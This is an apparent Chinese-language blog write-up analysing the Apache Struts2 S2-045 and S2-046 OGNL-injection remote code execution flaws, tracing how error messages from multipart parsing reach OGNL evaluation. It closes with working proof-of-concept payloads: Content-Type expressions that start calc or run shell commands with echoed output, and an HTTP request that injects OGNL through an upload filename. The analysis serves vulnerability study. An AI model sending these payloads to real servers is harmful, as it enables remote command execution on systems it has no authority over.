S2-045、S2-046

前言

S2-045依然是一个Ognl表达式注入导致的RCE漏洞，且漏洞很严重。另外，还是建议读者阅读本篇文章前先看下系列文章的第一篇。

正文

依然是第一篇文章中讲过，StrutsPrepareFilter的doFilter方法中，在获取action mapper前会对HttpServletRequest做一次封装。

跟进该方法内：

可以看到在wrapRequest方法根据请求中的Content-Type的不同有两种封装方式，当Content-Type头信息中包含有“multipart/form-data”字符串时将使用MultiPartRequestWrapper进行封装，跟进：

这里最好还是debug一下进去，以免分析错了
   curl  http://localhost:8088   -H  "Content-Type: multipart/form-data"      （使用curl构造请求头方便一点）

可以看到此时实际上调用的是JakartaMultiPartRequest,parse() ,跟进:

processUpload()方法故名思意，应该是处理文件上传的(Content-Type: multipart/form-data 本身就意味着请求是个上传请求)，如果上传操作中程序报错，会被101行出的Exception 捕获到了

这里有个大坑，大家看到上面图片中的101行中e的值了没？报错信息里压根就没有字符串是我们之前输入的，是一段固定的字符串，无语(为了文章的连续性，我将这个放在最后面讲。)。

关键函数出来了，就是buildErrorMessage，跟进去：

调用了LocalizedTextUtil.findText(),继续跟进：

findText方法很长，关键在于第325行处调用了getDefaultMessage方法

跟进该方法

第399行处调用了TextParseUtil.translateVariables()对报错信息message进行了ognl表达式解析，这个方法我们之前分析过，就是对${}或%{}中的字符串解析，这次就不跟进了。

现在再回头看看，怎样让报错信息中带有我们的输入信息呢？之前我们说了是执行processUpload(request, saveDir);时报错了，我们跟进该方法内看看：

执行parseRequest()时报的错。（什么？我是怎么知道是这个方法报的错，debug发现的）跟进这个方法：

看了没，contentType不能以multipart开头才会将它加入到报错信息中，否则将报其他的错误。

最后给出poc吧(windows下弹框poc)：

Content-Type:

%{#type='multipart/form-data',#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,#cmd='calc',#cmds={'cmd.exe','/c',#cmd},#p=new
java.lang.ProcessBuilder(#cmds),#process=#p.start()}

兼容版有回显poc：
Content-Type:

%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='whoami').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new

java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}

S2-046

S2-046和S2-045的爆发点是一样的，只是输入点有些不同，利用方式上不一样。满足以下条件时:

1. Content-Type 中包含multipart/form-data

2. Content-Disposition中filename包含OGNL语句

3. 文件大小大于2G（默认情况下），通过设置Content-Length就可以了；或者filename中有空字节\x00

给出别人的poc

POST /doUpload.action HTTP/1.1

Host: localhost:8080

Content-Length: 10000000

Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAnmUgTEhFhOZpr9z

Connection: close

------WebKitFormBoundaryAnmUgTEhFhOZpr9z

Content-Disposition:
form-data; name="upload";
filename="%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Test','Kaboom')}"

Content-Type: text/plain

Kaboom

------WebKitFormBoundaryAnmUgTEhFhOZpr9z--

参考文章

https://www.oschina.net/news/83099/struts2--remote-code-execution-vulnerability

https://cwiki.apache.org/confluence/display/WW/S2-045

https://cwiki.apache.org/confluence/display/WW/S2-046

https://www.jianshu.com/p/344f5091499d